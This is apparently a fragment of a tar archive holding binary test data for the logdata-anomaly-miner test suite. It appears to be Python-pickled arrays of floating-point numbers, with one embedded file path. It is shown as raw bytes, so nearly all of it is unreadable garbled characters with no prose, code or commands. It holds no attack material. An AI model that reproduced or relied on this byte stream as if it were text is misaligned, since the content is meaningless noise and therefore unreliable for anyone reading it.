JV*G?&7\+G?jeBKG?}ARG?Ƈ>2G?ZG?G?!}G?bX9ZrG?l>G?G?mÿCUG?ZA6G?wG?ŖG?A&G?>בG?ؾĎAG?wG?㋦p>G?neZG?QnG?U K~G?~}(G?⊴XG?ζՖG?טpG?9G?:;SG?jo%G?8VG?E i[G?=geG??CG?zG?29G?~G?Y' IQG?9(G?kjnМG?%tG?U=G?ЏʷmG?PSG?==aG?^G?G?/hG?`BG?UqS2G?eG?3zqq-G? SG?RWG?տA$WG?,qG?-B(G?jٹ6G?X \nG?HsvjG?жP!G?޹(G?5TgdG?UxG?ՈePi5G?gUG?!G?ثM.G?b̔G?־G?NPE7G?v70iG? 2`G?Q1ַG?׭(tG?ֵ:G?骤(lG?љR}bG?G?(OG?щS5#G?PKG?'G?9CMG?GG?=;G?EnG?ȋf*G?yӍ*G?<>dG?䡗qJG?\G? ZkG?e9G?ɍ8߄G?ŀM~G?<䵈UHG?\G? jѸ6G?iG?'4v~G?15G? 6±nG?+ĽG?FG?/ G?iws7G?ܴf+G?PAOG?AmOG? Sl1TG?#:$G?ޢfNFG?އ~1ȊG?طWiG?TAG?QlzG?y{XG?UQ,NG?ΑcG?01v5G?dExG?4 `G?ŀ:G?mE*eG?*G?&G?7KG?(G?۶G?>DG?"NG?ɝAQZG?F636G?/G?FgG?·L*G?a\G?]fG?DG?=YP;G?pG?ے3❶G?& G?<;G?G_~G? BG?R`|G?d~0&G?'Q&G?P'G?^G?`kv>G?ɝ@ƕG? G? G?0|v'G?AHG?QIG?ܓڻ'/G?`,L'G?N.;G? i)}G?(G?;@G?z:G?Կ/5G?& 8G?ÔvG?Ֆt$G?Φ^nG?$G?otG?U"G?Y@G?π,$G?ĭ1 hG?@$94G?$BG?@QG?rG?4{"/G?2G?ؚTG?sQG?:yaG?" c#G?ã}n&OG?XG?M6-G?@ruG? xG?#M/G?xJsG?t4G?بG?e~G?9G? 
u^G?/xG?uӰ׎G?{7pגG?ziG?̦ePtG?,,ѿG?*rĆG?%LCG?fUG?;@G?!$ĠG?wVG?prG??teG?#'G?KxRG?$TG?uG?-&G?͈(G?o|]'G?EPǎG?#yFWG?%&M G?sBG?:CG?itՍG?R_ nG?MG?Ӯ]{AcUG?֋moG?TG?"+G?w`z*G?|rjG?װ;a"G?1G?˝0ũUG?9 zuG?G.fG?5^G?ON7#G?7PG?_}G?M& G?:G?juG?=HG?tR+G?ęXG?gkG?{)G?-cG?|3GSG?A/Z0VG?,{">G?ޜXG?o1G?tG?jNG?UpTG?T3ҰG?ppG?j:N\G?IYWG?ڒ塥fyG?۞xpIG?̐ݴqG?G?u G?JUG?uoG?(MQG?r؄AG??G?Ɣ[ G?J%® G?Y0_G?a7YG?§G?ޠ%G?HjG?s2,hfG?AG?ſ`G?3 QG?S`7G? IbG?5sHG?PxG?GG?oӇG?|]G?IgzƋzG?iG?JLG?9}#HG?ڥ439G?ڡG?4VSG?E|G?~5U#A3G?spG?͑ rG?|G(G?Ԉ,G?ۙ1iG?W NG?HzG?9G?ɶd wG?'DG?# G?bzjG?(5UG?ɃM2G?+~.RG?BH UG?oG?h'JG?*y~PgG?G?,ztG?PG?sxB?lG?EԪ̶NG?٠˫VG?Ե2G?A5{G?q\NG?{#InG?aN5$b*G?Z \G?tG?S*+G?!3G? a4G?ZJ6G?EZɗG? >G?!G?[G?$o e(G?BM)G?à=_G?сvpG?I5G?hK:;G?Ն!=:G?۶.G?ћG?YDG?"VG?iG?ЙxvpG? aDjG?U(V&G?]~G?½'9G?%[aG?צ紟G?ۜG?,G?_0jG?؟6'&G?Ue-HG?̀iyG?Խo}G?ރKG?٩1粹G?ڑPkG? _G?-详FG?d"G?g;vpG?ӧFoG?>SG?ؓ\AG?=(nG?߃XG?_G? xG?V(cG?ĴDVRG?93rXG?U:G?ŵ G?4vG?4h((G?ˏ|G?޿BحG?أ> ߞ^G?xHG?-xKXG?#xG?6G?R G?hnŴG?qŬ;G?G?\9@G?\!PG?4G?ן]LG?E6Z.hG?glݡG?}VG?#G?,ßbG?X'=]G?/G?G?G,nG?~IG?@sG?=G?lAG?j:01G?\BG?Ԅ?WG?3jCG?=4kG?GdzKG?>VvG?|CnG?eG?ϛXG?\vG?ݝMhNG?\p+-G?^G?LrG?#6BEG?-d;G?{IG??AG?n]G?.G?S@VG?и~G?# G?ݎ~7G?>EG?..6G?gS G?`Vv,G?ΦD#G?G?AqG?[tG?֖G?AGlG?,"p@G?+;G?,XJZG?ɱ_DG?ƪ#"ܽG?uG?0G?MdKG?ږgcG?4EMG?YdG?t7EG?HhG?;HŁBG?bzG?kG?G?*;9G?GQ6G?q', /G?ƽOG?G?!?G?!B2G?$#9G?0ݑaG?ˮ%VG?+ G?3X,DG?/IՍ G?FdyG?g^{G?l\lG?՗ӉR&G?,OjSG?Ҫ[M,G?ofmG?R/yR G?'6G?tüG? .>IG?G?5y?G?4R G?ƭe G?߫G?ٶ%aG?SOJG?UMiG?>d"~G?긏MG?mC^G?ue#vG?ÉʣMgG?iרG?ۯMG?5>G?G ?G?V~G?},y;.G?_>G?DcG?G?zfCG?JmG?̻ŜnG? ; U G?ȇeG?Ʌ G?,a/ҟG?ȼ3G?XG?ibRG?KgXG?5WM3G?I FuG?hiG?՝ G?J+XG?) Bn6G?)a(G?JxG?1U >G?[wG?KS7G?ɡtnyG?ՕIşG?F|OG?oZ/KG?ۭ-;4G?JG?|G?AԊG?yi#G?jW^xG?G?ƂwG?.ܛG?~G?(q#G?xG?z(G?Ѓ&0p!G?ӴqG?#nG?vYG?҈}^G?1yAG?XG?*G?hG?U=Y`G?;0G?CnC"G?2G?A`bG?M3R/G?W֨G?.PG?qLG?a;<G?&WG?_+G?S NG?вOG?~@ЖG? 3G?apG?Ņ ՞G?ֲCG?PeTG?o+G?Qm2G?̮`G?vvVEG?\VG?߼3G?ӂuCG?zG?ζfG?Hw.?G?XzJ7G? mWPG?џG?jp74G?ںwhG?Ӿ[ UG?vgG?ĩS G?4G?m/ G? %_G?w]-BG?k! ?YG?4 G?~G? 
9*G?ׅG?̳zJٞG?Y:G?kGG?xoI G?%4{G?֙HG?`kG?G?hӄvG?Q5aG?Y^&G?^G?{lG?4<$G?WG??_KD$G?/̔G?G?~G?[G?UG?׆G?BMG?G?ѭNG?8jG?SC{ҳG?,e@ G?foG?ԖG?)=OJG?Vy< G? #G? wG?՝PkG?G?r&GG?'G?n"(G?ç ~gG?>ɮG?k1,%PG?.G?ū!#?G?(vUG?d#G?t)1G? }8G?"AӲG?cbG?㰆PG?G?ś\G?9CcG?SeG?¥qG?}H'1G?x7G??f4G?!zG?-랓G?O/G?;}ZKG?/JLG?θJG?_k;G?b5G?S~Z,G?ؤuG?-8X %G?aq ;G?l-/ G?g2<G?æ+*G?׈orG?ξB{G?Z[G?ƽDyG?˧G?9vG?~ wPG?GIvG?ؼ2HG?\3FHG?kG?ZN#G?5G? jwG?(uG?02tG?˨G?Zm4G?6=G? JHG? ."0G? 9=qG? #G? 5lhG?-Qg*G?)9AG?Yv(G?w=G?͸qJ4G?>B6DG?y G?ŷG?#UZG?ο[ G?&ǺG?7/G?^h 0G?֑P;G? ǵAG? TG?bPF9G?ѭz1lG?‚ɱ,G?-wlG?${`G?ߔ@>G?CG? 7FG? G?kCG?? G?=G?7GwfG?;j;WG?C{G?="i+.G?{EG?N7\yG?=WG?+TG?E/f~G?G?HKQ0G?St^0G?B_ LG?ٰG?ѴߓIG?&=r!G?޹G?ȕ!LjG?{rcG?_GMG?ĹV̵|G?žJG?W*JG?7r\4nG?_x[G?%G?ԉ-gG?'`8 G?CL72G?m G?ާMWG?Fg G?Ɖe]G?B,G?WG?ڦ݂G?vG?8!vG?g>G?G4G?[jܷ4G?KG? ,G?ʬޱIG?ڸ)jG?pЪLG? FlG?1UcG?ݿyG?$*G?5UeG?ͰG?¾ aG?$i?G?/ nG?ݕy(G?oґG?MG?B_;G?G6[G?^ G?VTT!rG?wƩJG?֓+dG? G?]@G?JfãG?LJ[EG?MߕG? o4G?d`RG?@1G?B^𤕹G?ءG?7t8G?L 'G?ViG?ѷTkpG?kd`G?` G?{tG?rPG?ͩQG?'G?גٿ,bG?Ў碥G?ނ4G?ЀfƙPG?+6G?e|G?G?ŋف+G?ZG?І37G?}c?G?z)G?v[k":G?tBG?¸#]G?hS5G?@6]G?FkoG?quG?ӕ&,G?zg>G? G?]9;G?ŏZG?eG?_x8CG?<|ޑZG?xyslG?ߚtG?ҫhTJG?G?P+&G?mG?2dE5G?gY76G?MkAAGG?G?2SG?cEëG?rG? NG?ϑ2G?YJVG?Ԟ2z/G?ꟸG?Z)G?qG?ؠG?7;zG?ݩ lG?]2G?ӻ~G?ҐZ6G?vG?=w}G?!G?MRG?Ԋ8G?T4G?돟[G?l%FG?'BG?]|G?\_`G?>06G?'$KG?^I~}G?l~[%G?ZSEJMG?G?a &G?Њ/ypG?ՏAQG?]G?Տ99G?Ӽ:SvG?J̍G?OG?3G?ٟԭG?1-OOG?سG?HG?@G?h ԞG?,,r-+G?sYMQG?eyG?"W5G? aG?ڦKJ4G?,wG?6I.G?ⴼ]G?NC)qG?ШG?̩6G?U3vG?ߝ. G?㓍ՑG??^ XG?BqbG?wB-G?M4G?0x_G?DVu5)G?ǽXG?":G?`\ G?{ąG?Wf"G?(&s G?Րs^ G?܊ G?dkG?gFo-G?AdJG?[,EG? | l\G?۴G?~@cZG?ʪ8݈G?ag]G?Baj G?(G?D>_G?W~0hG?nz~G?ӴfG?۱'G?M\KG?F-쇢G?TV6G?6<G?HwG?k8G? |G?ǚ1}6gG? ]{G?^ S:G?,gG?\aDG?{7DG?=3G? gG?XpjscG?rIߏG?!nXmG?WOPG?ALɾG?HjٕG?*q 5G?0`=G?ErG?zR6`G?b]G?H&;&G?F. G?BjG?'ӵG?E#ѪG?<Z~G?N/u|&G?,2dG?o-dG?ӑ*:G?VaOG?||G?߳6 G?eG?=.vG?ȱͻG?˒F?2G?G? /eG?҅!xcG?-##G?ͱJG?Ѥ&M G?i5 :G?FG?pEG?e`+MG?xB@G?.H%G?gR7G?ߞG?`=G?ҍ`U3G?΂A4G?ԩ D)G?N!1IG?!)G?qOG?H G?ўwj0G?ˍttG?RyIG?qw.qG?z)=G?vgG?Ā5G? 
gG?^ʌؔG?ǝ)WG?H%  G?W"G?*$ڝBG?)M!G?zdG?'N;&G?{K&>G?fߥ߼G?Ǫ紐G?PG?g%cG?NPwG?}zFG?ʴ-G?9G?~h!>G?;)G?ΧJ G?ܕ)/2G?ٴzG?c0mG? OXG?ms?BJG?7RG?0t:G?փgG?8֢G?#CfG?APGG?-ٳ/G?3>FxG?Ȉ"`_G?4G?c}G?T2G?+;G?2GG?˲kKG?G?!1P PG?>u[G?5ܹG?)KG?J /ˀG?Լ);G?FHG?Փ5#sG?녷G?ƫ`G?y 8G?/G?ҏLG?[}G?_L_CQG?1G?v+7G?iFzyG?[˭n>nG?~[[NG?竨 G?Q],G?RXG?Ђ72G?r+ G?C%G?*$G?f 6G?o!G?tG?o (G?:OG?aG?C)'G?֏XY՞G?ǩcȥG?jA?G?o#GfG?m4P)G?schEG?ߘG?}AiG?S#G?Ɏ.}CLG?bG?6eG?IG?NG?iazG?TG?hJ G?ZwFrG?JG?yACJG?' ;NG?/G?mνG?ajyG?AEOG?6(h2G?ѫgG?KVQG?;|G?TsG?HG? G?^.aG?IܯgqG?xG?)sG?+9G?9{G?δ|G?Se](G?kJG?Ͼ|PG?Ԑ~G?# >`YG?|+G?Ӄ "G?Ɛj~G?knG?:G?b#xG?6^G?ǩG?>U jG?$1YG?LWG?RܼG?̃ Y5G?!RG?"tnG?֩R]G?=2$pG?ԑiG?U>CG?ـ 0G? JaG?nG?6uG?:}G?? %3G?\EG?֕ԀAPG?G?N^AG?(G?.G?EBEG?Q oG?nrG?f=iG?(G?ũ  G?*VG?D{"G?5rPG?O+hG?+m+G?(@G?փ'rݸG??4[G?bY9G?СPs^˚G? G?7MG?MGV\G?e kG?;')G?A#VG?٘EJG?bG?Ϋ{G?vG?SؑrG?Ό[ G?(K2aLG?ØID8G?3bFR7?G?ؙܸG?kʙJG?ɝD7|G?rzG?4ȥG?X6}G?ڨ0DG?pȍ8G?ǘ2;gG?p.G?ŦY G?xW3-G?wrG?3!*gG?G?/uG?ǫ񌃸G?ԋ.O0G?jgG?oSNMG?]"7G?ԥ^G?׎uG?ˤ@9G?ߡG?FTG?AFG?0&G?Dˈ{G?a1G?7 DG?}s^G?! C}G?!8G?pG?߱Je*G?JVgG?6;G?6 }TG?G?zYzG?ΊײG?qJWG?3s+_kzG?oOPG?c>G?MUG?L@`G?š =G? HKG?\ÂnzG?X>.SwG?܄;`G?G?t}G?׍S@&oG??u! G?‚KKG?n3OG?DAG?Qb8G?xQ G?ִLG?e$vsG?^ZxG?|ktG?d[~9JG?ڝd)G?҅#`PG?KG?㲄 {OG?iG??4yG?K &G?SpGSG?r_YG?ىVG?#G?fBaG?0T^iG?|g!G?6@G?8UcG?6G?r G?5lG?TZ~G? PwG?.aiTJG?q>ctG?rhG?X E%G?G?݂\4G?Cm?G?B&] G?^G?sNaG?0xG?ՔwG?{4{G?.+V$G?:$G?ڵZG?ӿ ^G?J =G?,f:G?ԙG?@G?ʹ ~G?gh-G?֥AUG?d=ּG?}k G?mG?{Oj}G?j޺G?vEXG?wG?O3G?r`qG?LG?'zvG?c-sF?G?.^XG?ὼt G?ƯIG?okQG?x:VG?G?85G?ׅG?PܰG?<{qG?̲$G?=wpfG?ÃTi`G?ßG?̝HG?>Wpȍ6G?FeG?\7 G?M؛G?~nWG?lZ{YG?VDG?zIG?Z)G?ġŒG? w G?KGlG?LsalG?rK]G?:$G?(yG?J)XG?婈PG?@G?`DxG?XbS84G?ӔCG?ӳG?.TuG?BG?(夬G?G?İ:`-"G? &0]!G?J}G?уxMG?LhT:G?;y4)G?TG?" kerG?AG?գB`G?nIG?p>G?Ȁ]G?ˤٲG?ϢT=IJG?;jwG?{G?2mG?͸G?ٿ#ЏG?ի՞G?p89G?v0;WG?&y G?T̾G?KG?߇b%kG?BM}G?iQFG?@ܴ=FG?q{G?Zv G?]/2~G?RKIBEG?,z=G?@`TG?J G?lG?G?҇;KYG? F[G?Iݒ>+G?9xG?ǙPx=G?ߗKG?ՂBG?;G?1%Hu7G?V6 $G?ΪKGG?*|G?;GG?۟`G?W#G?AG?O8G?Ʀ4G? # G?QG?vKٞhG?>G? 
S(G?ְ[G?qG?DdlG?ƪ[)dG?reG?>v[G?d_G?P:G?N:~bG?3sG?BXCfG?f'G?XG?CVn G?Lf:G?Ĭ9G?ݙ8BPG?䤼83G?gG?m@G?­iC1!G?ؿG?< VCG?، U[G?g> 'G?#G?KV_G?c-|G?q ;G?=-EG?¤D2_$G?yFG?HG?^*G?WG?\`V tG?g'G?ӇLΈG?3G?(G?G?Im:hG?>SG?% ^OG?W&zwPG?hXu~gG?Ӥ$7[G?ӿRJNwG?G?"lfG? i"kG?k+M|G?HG?ߙqzG?V; =RrG?)<'G?!*+\$G?ˤD G?Ҵ]G?qnG?xǜG?7 7G?}_%G?| WG?^ c5G?وG?ɓ\E0vG?e3 G?i~ZG?^DG?Cu{>3G?$ΈG?R֊X)G?^egG?P G?@|G?[G?o.G?rՊzG??RJ0G? oPG?em䋝G?H G?¿-i/G?/ .G?nJXG?Ի0G?dsG?RTюG?g53UkG?[ȥG?!e_3G? a0G?φ`FG?G?<%-G?Zvt\G?faRG?1ݚ䠃G?8G?:G?>k"G?7a 7YTG?nG?˽?1G?f4G? G?kׁoG?ҕʶG?`8G?tձG?kG?ȫ;xG?ʤЧG?MJ~@G?+xG?z<eG?ЏJ G?Q1=G?JXG?'w G?ї1rc G?qcU G?Ps0:G?1cCG?#IG?Bs9G?etG?A'}QG?ٿHG?SJG?=FG?O%EG? YG?Ԁ]5G??cG?£ G?mNlG?"ʊ'G?h4G?YY/G?؇0G?e#G?:|7G?Em[G?pG?Ͼ}G?**6G?ʨ>G?Q!}iG?nCyG?G?G?G?'GkG?sPols_G?M 5G??ZG?  G?DžG?7G?-G?;oքG?VDG?G?ʀG?hg2G?^L2nG? #G?KèG?>c|G?̟4G?t"wG?>מG?xV81G?Y7LFG?ɵG?U[G?%>@G?҄G?<>tG?QG?Օ{I@G?G?:-G?G``G?ϿDfG?#wiz G?ô k\G?z3&G?^pOBG?M5$ZG?AG?=Hx|+G?}G?A!G?{!ǠG?ر-+G?hvqG?rr.G?ƞ #bG?̇u1G?-o"`G?d\G?7/G?WpG??mJG?완G?V4>G?3W2sG?٦>VG?Q2wG?g-_lG?ٲWtѪQG?0/G?Ȼ ;G? 6UkG?L(wG?hJG?b٤G?ʛBG?5C0G?Dm4G?uב'G?HsgG?L螝zG?BdtG?hNΡfG?T =ՃG?x2'G?5QG?K2VG?f'2WG?unG?FgG?Τ~X;rG?|H(G?o2w\$G?…鲅G?n2kG?Ũ4G?;7ígG?ag݆G?=v;G?7֍G?1G? ܆8G?<91?G?wJG?-G{G?sV G?BPV}G?/)G?0xG?~'ŋG?LPdG?ƽ3f2G?,ʼnJZGG?ׂd@OwG?uG?8'rӗG?o#qG?[9,G?c[x,fG?G}G?'Z:G?V$n=_G?LG?tUvJG?OǥJ'G?suUG?lXQ@G?d{G?0C S//G?G?G?pG? ]G>ϨEfG?( G?ĉgMG?s"G?ݭ#G?H1ZG?s7G?_LqG?E3mG?A_G?; pwG?xG?\KfG?ՠƈ G?TC\G?ЭRghG?`[G?c,G?濷^G?IG?g4V'G?i?6ϝG?a26G?ԑIG?5PN*G?)mG?z ^G?[gG?1ڳhG?]\G?.G?7,EG?b֒G?RM:lG?֩bNG?moG?ŇG?`SG?fG?̻n-G?5; 5G?7G?xdHG?fHbG?E) G?z`LLOG?(WG?̈DG?ܝWCyG? "}iG?`XG?G?K)VG?Z)G?-%uG?JlG?4FVG?A2kG?ҷG?tG?M- &0G?. wG?‰03{G? K|?G?mG? ${&G?~3+}G?MYTG?j}( ^G? (6pG?1|\G?ч祖fG?kG?f.G??G?ŽӦG?[G?Փ*G?hQ_ZG?m4G?rG?:[G?ٗYt#G?ьE4;G?oG?PFG?NG?W6mxG?`+8(G?FG?NG?7 ;G?cG?˲' G?"\eG?G?6U0G?VNdvG?o?G? ,%G?RiG?##"mG?xG?ɛ>G?HG?X5G?FhSYG??FWG?tG?kyG?M+G?%>JG?,G?l-%G?vFG?зʰiG?^FG?-Z|G?kR}G?*aHG?|EG? G? WG?Qp8bG?H/cG?"G?_ZG?< 'G?Ь*G?ϧvG?ƺvG?dqrG?J}p6G?̣G? O;G?j.G? tXG? 
jXG?lcG?oG?هG??ҜG?UI1G?FObfG?Шј׍G?R7xG?նv'G?zG?G?׵/G?/G?8) _G?P+MG?«7]{@G?osG?)wZG?[\G?̮_G.G?/SG?אVVG?G? \@G?PiG?ȖdG?zQG?%QG?n'LG?ʔo/5G?$`G?G?Ï]G? [RG?XbIG?r(G?~MpUG?Ɉi*G? чG?2G?PG?C)G?SwiG?p.ˉG?Kzn G?0XdG?D˻/G?(ˋ%\KG?a\U*G? nG?J!LG?/sG?:ôDG?hEDG?^HG?1-=G?+}SG?ǥcG?JaG?kg}G?3\mG?%`G?bIG?вPEM+G?Sy G?ayEG?xuHG?<׶G?ՅTywAG?|Þ PG?hʤdG?2^&G?ҝR+G?vG?Ybre?wG?~N5G??(G?6MwG?FG?bG?UG?Ճ TG?X#bG?7_ȶG?Sb_IG?GM>ZG?Pi G?X߻G?o G?Ç8-G?+vG?rG?_G? )G?E]„G?5UsG?fﻅTG?G]D͍G?P?mG?@\yG?Ɵ_SOG?н`{G?MsG?ͽu3G?uX?G?G?a-G? G?Li"G?W G?̊{f=G?^:G?l⾨O$G?X1lG?aeG?¼ISҺG?]{=G?Tc돦 G?%lG?G?ʮeB.G?ƌ9%G?Ķ$v;G?l>v.$G?_G?z B'G?r$,G?.YG?yQ2gSe(G?LwG?NG?G?xX~G?؉!cbG?ю,TG?,dG?ݢG?Nh G?BxG?WJWG?r G?6G?i{kzG?oh}!7G?w띧p G?O!FG?+V_G?ƂG?չG?*ֳG?= G?UJr_$G?lAG?qJNG?(qG?7|-G?ã$CPG?yճJG?ʙG?m*[W;G?H"-dG?I ۅG?g+~4XG?:G?rG?{wOG?B8bG?qrG?5mG?a=۫G?'IG?jG?L G?8stNG?YB[G?: G?pCDWG?ѐR07G?!ᥦJG?[T<#G?h{G?okZG?ft:G?Tr?DG?zxLG?cG?~SG?{(G?sAhG!G?Us-G?VDjN-G?(H3KG?0~!SG?E>G?,'dG?KgG?ÜG?pi>QG?gdG?n=G?nG?G?}GG?uXG?PzwG?Iz.G?lBG?ޱeDG?r4iG?'G?2G?JG?Gi7v G?65G?ͦiG?俥"G?\tyJG?md7G?A LԶG?w˓=0G?K2T'G?Px&/G?SG?a(SG?PƉG?%G?j}ҿ:G?'϶G?=^G?~f 2yG?٩G?B*G?mo\G?]G?laG?DxG?6?nCG?6dG?tG?eXG?X (G?,+T^G?9G?ȎJtG?OmG?֗W_AiG?َ0gG?uLG?fVؕG?P*6G?l}G?˯~KG? G?W͒~G?<(F_G?aG?ХDgG?3_ G?\G?8aSdflG?7IG?b2Vo G?-6UG?8󱉏G?lw;,G?a\G?q/;G?IG?l9KmG?`G?_7G?]G?3^.G?J G?[{G?ÞiG?Swj[G?Ť!L;G?ufyG?G?AG?óm^-G? yG?ot'G?ю G?5DpG?*,vG?OwG?х9I{#G?gF2G?_PCYG? R@G?6xG?^G?vG?PaBmG?@*߁G?^G?Jr,QG?aXZG?HG?8BRG?4cRG?١G?Fz@G?{G?èLG?>{DG?[Mhz:G? #G?ygG?-d5G?QψmzG? TG?*'G?=WG?iG?-tG?O<G?߅G?Ϗ=g)G?ѓG?7G?.cG?7OG?EtHG?BG?~yG?9 NbG?tG?{5XWG?BH!G?<G?&˃tG?ΔɲYG?<5KG?iG?^G?)[G?JDjG?cyG?GG?pG?etG?%G?Y4G?]mIiG?#>BG?|.o$ĂG?ivKG?eG?l[/G?HN)G?٣o#G?JPG?l#\G?'G??aG?tǬG?tLG?M/BG?.!eG?аyG?џG?uG? DbG?ԪG?liG?iG?![KG?GPmͯG?!EUG?35G?5-8 G?Ӟ%CG?ʈȚG?v?G?%֫9G?\âAG?PsG?JBKG?7c9G?E#G?%"pG?q2G G?_˶G?@՞6G?մ[X=G?!&WjG?~hYO8G?Њ4G?y+ G?,l=G?rpG?U HqG?2DG? ;0yG?,}~G?uD[mG?Pc5mOG?܉ G?^6>G?|G?Y8G?Z>gG?š،ISG?AckG?آ{VeaG?@UGG?81oG?+ۄW3G?|˧:#G?iG?!_G?ktEG?2 EG?NEeG?O|pG?X/G?׳ҿG? 
f gG?9^#+G?#Ó@G?՞>0G?]e G?2JG?nؚ&G?,G?^JG?:0G?T;G?eK"TG?VjG?FmG?+[G?0 G?"3G?ſKrG? G?/L۫`sG?~6TG?FWsDG?95IG?{G?90G?4ΓXG?D՝"G?Y\%JG?%9xG?YڟiG?O }G?ΩBG?3 G?>}G?rìG?WX[G?Z G?\G?'OIYG?͙rG?C腳G?k'xSG?6.ZG?ܐ/G? G?cCYGG??#/ G?BRbG?T=G?OG?,MG?ےF)G?blHSG?$u\…G?{kG?LsYTG?ȓR>G?G?.(G?#\G?jMÌG?@G?#G?uGG?{-G?ZTG? ViG?jF~-G?G?6tWG?D,qG?{hTj[G?^zMG?jq?8G?+[bG?,4TcG?4/G?n ^ܾG?: vkG?}TG?'0PG?@G?t"G?}ǶmƝhG? sG?fG?˓ \ ;G?0"G?78jrG?Ąb"G?a _,WG?{rv}G?wy|pG?m,^G?_kG?߯(0!2G?IJG?\'G?W/G?VSLIG?iZĮ G?O+ùG?BG~G?J9aG??~G?򘦼G?B[fG?/k/G?["*G?4G?*rG?7識G?ž؅BG?ɎC9G?ӻG?:ӢdG?ΌG"HG?#׆9G?BjG?kG?ЯQ%G?-gD G?QpG?t ,+G?YQG?MjG?=MTG?F&Y G?˅sAG?VMG?ٓKWrG? ZG? 4G?ϋ8G?\~FMG?MQ G?҇]G?*]"G?Lߌ,G?d`L#G?ڔ(G? G?[׀G? yLG?HE{G?L6CG?^><_G?]p.G?ѯkG?u]ЮіG?رG?%G?5G?k"G?c*G? %G?*qyBG?NG?tvV G?.G?hG?+!uG?׺IJG? G?6bG?qFG?k5nXVcG?ɍcRG?(ZG?{ұ$G?Gp&xEG?ZzG?zqG?>zoG?WtG?mȽWG?\G?ɢ }'G? ǮG??CʂG?VG??ӖAG?ƌ:VG?5G?`ƴG?ٌPƴG?'\itG?P'3G? `߫G?˜HJG?o[G?.'G?ݗ }G?ѨG?qG}G?BG?)RG?dG?9B^G? GG?Լ-K.G?:l)YG?'``G?ZQG?{-G?ӛJMLG?k::_YG?{G?*ugEG?c_rG?[-MG?x¸G?jG?IoVDoG?Ӯ)bG?ļwyQG?xX-G?1n:G?-G?UG?h^VG?xצG?BJG?Ɛa{G?g*G?PG?TM-G?b G?#DG?QKpG?ƎxGmG?3yOzG?G?kXG?귊rG? }iG?KG?5=6/G??G?HMAG?X`KtG?ÚnrG?\G?t ӘG?±`HG?" 0p*G?5j|ahG?ζVJG?}G?L ,G?G?-ۺyG?Im:' G?ЀGdG?68(8G?p^G?ߜG?sG?*{;0G?EʔG?W$G?-QaBG?ѽxG?MMrG?* +G?wG˺AG?W-mG?m@zG?|iG?r/)yG?/ZjG? ՎG?R+~G?`>G?pӣG?n'G?UqG?єVFG?cs?陰G?1VcfG?/TG?J,IG?6G?̕DFG?RHśG?ZVG?nfC.G?`\G?gG?ƂG?R:G?Фs)G?&G?_XHhG?%W G?) oG?RG?͒MB4G? ZG?U4/G?̮=G?NM*G?,SG?VS۱G?."*҂yG?!σG?͢tG?C̊8G?G?ZG?W@-G?ɰBG?ۀV,G?5_ 2G?ϟ ?[G?YjXG?[G?$ujG?(Y0"G?Tue](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta4_data_test7000066400000000000000000000647021500476301700275310ustar00rootroot00000000000000i](](G?Xl|G?n{G?[nRG?LG?Duo::G?yG? G? ǰgG?d jpG?ӉCOG?F*춉G?p0G?0@G?=WG? tG?0ƪG? gG?; G?ەVvG?]>G?GۅG?@V+ӍG?vIG?ƨG?41 G?8G?g1!G?ɟxG?!1rG?f'yG?unG?ZnG?V^G? MG?"~G??fG?MdKG?˷: G?m_4G?2G?gG?GB@vG?΂:A}G?3dq_G?|؊G?Q\G?0zG?ɰ}G?ɞ4G?Åf)7G?MGG?K4G?;bG?B3G?)øSG?LG? 
˜G?sG?9G?ݒC$MG?R SUG?Ď G?'ҿC\MG?boG?k;G?XToG?[G?XNG?ў$=WG?BG? G?2M|iG?Gr"G?:q~G?%~G?)^hG?ʒaxG?ğtHCG?͢#~G?oKLG?|μlG?v?*G?kQ'G?G?"]GG?+8G? G?wDGG?OvG?"-G?&Nx G?aG?V٭ G?vG?rbG?=G? SG?r%G?SŠG?^G?G9G?w:4[G? [+WeG?ܺ[G?z;b}G?йG?p"efOG?ޚ0G?{iOG?~G?ڎG?ZMG?ݢ56.G?t{G?\xG?:0G?jt8G?ΓY`G?G:UG?EG?@|@G?'H,G?SRtG?z_oG?hpG?cs[:CG?2PG?L"G?<놟G?ǵG?hvG?qH5G??֠G?ƒ܎AG?y@JG?LH@G?#xbG?\G?5bqG?w;OG?[h!G?G?~3G?S,&G?Քr1TG?*cG?G?QUVG?j4G?)"5&G?pUbG?iK,|G?G?YzG?&'=fG?bIG?geG?־ɦ"G?¦Y7G?ΏG?+kG?G?11G?HG?ќLOG?*G?ǥ$G?Q+xG?P^9G?o{G?FN0G?v7G?<?G?؍wBsG?RƳ5G?Q sG?vGG? M^"@G?m>CG?Ƚm}G?>zGWG?dG?*?zG?]'G?tHG?G?ɣ vG?̯q,WaG?G?l>rG?|v]4G?IfG?]վG?\럲 G?D_d-dG?iRG?G?Ā]G?$2G?(>G?l1zG?U/G?Y%G?-G?]G?#V{YsG?¹`JG?Z/G?{>G? nG?ZG?G?w #G?-hjs[G?4G?˫|G?HG?ˍ<G?=GG?9ۤG?&q<#GG?w-Q+G?0>\wsG?QG?'G+G?JTaG?GNG?`ęG?_G?͏8vpG?) G?ؾR |G?ì eG?*=,@G?,G?Z_1bG?-cG?ŻsG?{IϟG?ʉgvwG?_ *NG?ܖjCGG?pnJpG? (1G?KH%G?!uT G?|! G? ߇FG?|SG?%tG?nPG?lܞVG?G?`'ϷG?˃(2{G?k~ÐG?폞^G?vp G?J8/سG?dL 퇂G?0WG?IKzn#kG?aer(pG?(KY"'G?=FG?)/G?]G?0?[G?, ضIG? G?^[KG?FG?zRcG?߽[&G?Q|Fj'G?lxG?>gqG?,Sb_G?ǜ2 ^G?ՙVG?wS^G?1wQG?| YG?ՏtG?|G?Tf'wG?ѱNCG?cT ]wG?IEG?92G??+_G?&IlG?k>䩿G?_LmG?Ԋ07G?o,G?> XG?UMe /G?vRG?RCG?wmozG?GrG?E]G?ׄFQQG?G?AG?3"G?3| G?zPqG?`xG?1#[G?]r@G?҄G?Ӕ6G?eTG?˲|G?R@2G?+Z> G?ReG?KG? (G?m jG?p,ɽG?—tNG?ō!G?6UZIG?HVG?2G?G?2'*G?gigG?2Z-G?`G?SEG?G?^HOJG?%G?w G?:FjG?DK@6G?uSG?Q8TG?Y#i4NR]G?(AuG?Ń+_G?gLg;ZG?G?+czG? ~7G?dG?hWnPG?݆Fe;G?)>G?'-G?˹)G?Wñ_PG?G?:xҴG?|SoHG?԰>QG?lrG?ʏG?220G?ʷVG?,G?G?hG?[ Kk*G?)G?oG?KGG?۸ !G?E߽q~G?lK,p\G?U 